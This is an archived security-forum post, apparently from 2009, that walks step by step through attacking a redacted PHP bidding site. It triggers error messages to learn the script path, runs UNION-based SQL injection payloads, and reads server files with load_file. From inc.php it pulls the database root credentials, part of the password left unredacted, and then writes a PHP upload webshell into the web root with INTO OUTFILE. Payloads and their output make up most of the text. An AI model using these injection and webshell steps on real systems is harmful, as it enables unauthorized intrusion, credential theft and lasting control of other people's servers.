A simple PHP vulnerability test via a warning message - Black Bar Safety Net

2009-04-11T00:00:00
ID MYHACK58:62200922871
Type myhack58
Reporter Anonymous
Modified 2009-04-11T00:00:00

Description

The test site is:

http://www.**.com

Find an entry point:

http://www.**.com/zhaobiao/zhaobiao_hy_show.php?id=149830

Submit a single quote (')

The result returned:

Warning: mysql_result(): supplied argument is not a valid MySQL result resource in /var/www/html/zhaobiao/zhaobiao_hy_show.php on line 135

Warning: mysql_result(): supplied argument is not a valid MySQL result resource in /var/www/html/zhaobiao/zhaobiao_hy_show.php on line 140

Warning: mysql_result(): supplied argument is not a valid MySQL result resource in /var/www/html/zhaobiao/zhaobiao_hy_show.php on line 154

The script path is disclosed. Continue with the injection test.

http://www.**.com/zhaobiao/zhaobiao_hy_show.php?id=149830'and 1=1 #

Returns an error, so the parameter is not a string type.

Note: %23 is #

Submitting and 1=1 returns normally

Submitting and 1=2 returns normally

Next comes the union statement

and 1=1 union select 1 returns normally

and 1=1 union select 1,2 returns normally

and 1=1 union select 1,2,3 returns normally

and 1=1 union select 1,2,3,4 returns normally

and 1=1 union select 1,2,3,4,5 returns normally

and 1=1 union select 1,2,3,4,5,6 returns normally

and 1=1 union select 1,2,3,4,5,6,7 returns normally

and 1=1 union select 1,2,3,4,5,6,7,8 returns normally

and 1=1 union select 1,2,3,4,5,6,7,8,9 returns normally

and 1=1 union select 1,2,3,4,5,6,7,8,9,10 returns normally

and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11 returns normally

and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12 returns normally

and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 returns normally

and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14 returns normally

Guessing 14 columns works, so continue to the next step.

Generally, the admin back end of a site like this is not going to be easy for us to find.

Still, let's take a look.

Guess the common paths:

login.php admin.php admin_login.php admin_index.php admin/login.php admin/admin.php admin/admin_login.php admin/admin_index.php manage/index.php manage/login.php manage/admin_login.php manage/admin_index.php

And so on. Those with patience can keep guessing slowly. Even if you guess it, it may be of no use.

We also have a more direct method: use load_file directly to read file contents.

http://www.**.com/zhaobiao/zhaobiao_hy_show.php?id=149830 and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14

http://www.**.com/zhaobiao/zhaobiao_hy_show.php?id=149830 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14 (the and 1=1 changed to and 1=2)

Returns the following result:

2

Position 2 is where the output is displayed; that is where we need the file contents to appear.

We start with /var/www/html/zhaobiao/zhaobiao_hy_show.php

directly with load_file('/var/www/html/zhaobiao/zhaobiao_hy_show.php')

The prerequisite is that /var/www/html/zhaobiao/zhaobiao_hy_show.php is converted to hexadecimal.

http://www.**.com/zhaobiao/zhaobiao_hy_show.php?id=149830 and 1=2 union select 1,load_file(0x2F7661722F7777772F68746D6C2F7A68616f6269616f2f7a68616f6269616f5f68795f73686f772e706870),3,4,5,6,7,8,9,10,11,12,13,14

The result returned:

0 or $regdate>mysql_result($query,0,'yxdate')){?>

",mysql_result($query,0,'sm'));?>

Don't bother with these. View the page source directly and find an inc.php file, then combine it with the path from before:

/var/www/html/inc.php

http://www.**.com/zhaobiao/zhaobiao_hy_show.php?id=149830 and 1=2 union select 1,load_file(0x2F7661722F7777772F68746D6C2F696e632e706870),3,4,5,6,7,8,9,10,11,12,13,14

Look at the content returned by viewing the page source directly:

<? $myconn=mysql_connect('localhost','root','www.**.comy0p5h1i0'); mysql_select_db('mlk'); ?>

The MySQL credentials are disclosed directly.

The next step is to log in to MySQL and insert the small webshell prepared in advance.

use mlk;
create table mmxy (cmd TEXT);
insert into mmxy values('<? php');
insert into mmxy values('$msg = copy($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]) ? "Successful" : "failure";');
insert into mmxy values('echo $msg;');
insert into mmxy values('?>');
insert into mmxy values('<form ENCTYPE="multipart/form-data" ACTION="" METHOD="POST">');
insert into mmxy values('<input NAME="MyFile" TYPE="file">');
insert into mmxy values('<input VALUE="Up" TYPE="submit"></form>');
select * from mmxy into outfile '/var/www/html/zhaobiao/mmxy.php';